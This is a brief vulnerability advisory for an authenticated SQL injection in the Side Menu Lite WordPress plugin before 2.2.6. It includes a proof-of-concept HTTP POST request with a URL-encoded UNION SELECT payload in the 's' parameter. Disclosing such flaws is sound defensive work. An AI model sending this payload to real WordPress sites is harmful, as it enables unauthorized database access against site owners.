Side Menu Lite < 2.2.6 - Authenticated SQL Injection

The plugin does not sanitise user input from the List page in the admin dashboard before using it in SQL statement, leading to an SQL Injection issue

PoC

POST /wp-admin/admin.php?page=side-menu-lite&tab;=list HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 46 Connection: close Cookie: [admin+] s=aa%2527+union+select+1%2Cuser%28%29%2C3±-+a